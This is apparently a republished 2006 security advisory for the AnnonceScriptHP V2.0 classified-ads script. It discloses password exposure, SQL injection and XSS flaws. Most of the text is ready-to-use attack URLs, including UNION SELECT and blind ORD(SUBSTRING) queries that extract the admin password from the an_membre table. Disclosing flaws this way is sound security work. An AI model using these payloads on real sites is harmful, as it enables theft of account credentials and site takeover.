AnnonceScriptHP V2.0 Multiple Vulnerabilities

2006.12.12
Credit: Mr_KaLiMaN
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

AnnonceScriptHP V2.0 -------------------- Vendor site: http://www.scripthp.com/ Product: AnnonceScriptHP V2.0 Vulnerability: XSS & SQL Injection Vulnerability Credits: Mr_KaLiMaN Reported to Vendor: 02/12/06 Public disclosure: 09/12/06 Description: ------------ Password disclosure (all members): http://[victim]/[script_annonce_path]/admin/admin_membre/fiche_membre.ph p?idmembre=1 (1 for admin etc...) SQL Injection Vulnerability: http://[victim]/[script_annonce_path]/email.php?id=[SQL INJECTION] http://[victim]/[script_annonce_path]/email.php?id=-1 UNION SELECT null,passe,pseudo FROM an_membre WHERE idmembre=1# http://[victim]/[script_annonce_path]/voirannonce.php?no=[SQL INJECTION] http://[victim]/[script_annonce_path]/voirannonce.php?no=1 AND ORD(SUBSTRING((SELECT passe FROM an_membre WHERE idmembre=1),1,1))=98# http://[victim]/[script_annonce_path]/admin/admin_membre/fiche_membre.ph p?idmembre=[SQL INJECTION] http://[victim]/[script_annonce_path]/admin/admin_membre/fiche_membre.ph p?idmembre=-1 UNION SELECT null,null,null,null,null,null,null,null,null,null,null,null,null,null,nu ll,null,null,null FROM etc...# http://[victim]/[script_annonce_path]/admin/admin_annonce/okvalannonce.p hp?idannonce=[SQL INJECTION] http://[victim]/[script_annonce_path]/admin/admin_annonce/okvalannonce.p hp?idannonce=1%20UNION%20SELECT%20null,null,null,null,null,null,null,nul l,null,null,null,null# http://[victim]/[script_annonce_path]/admin/admin_annonce/changeannonce. php?idannonce=[SQL INJECTION] http://[victim]/[script_annonce_path]/admin/admin_annonce/changeannonce. php?idannonce=1 AND ORD(SUBSTRING((SELECT passe FROM an_membre WHERE idmembre=1),1,1))=98# XSS : http://[victim]/[script_annonce_path]/erreurinscription.php?email=[XSS] http://[victim]/[script_annonce_path]/Templates/admin.dwt.php?email=[XSS ] http://[victim]/[script_annonce_path]/Templates/commun.dwt.php?email=[XS S] http://[victim]/[script_annonce_path]/Templates/membre.dwt.php?email=[XS S] http://[victim]/[script_annonce_path]/admin/admin_config/Aide.php?email= [XSS]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top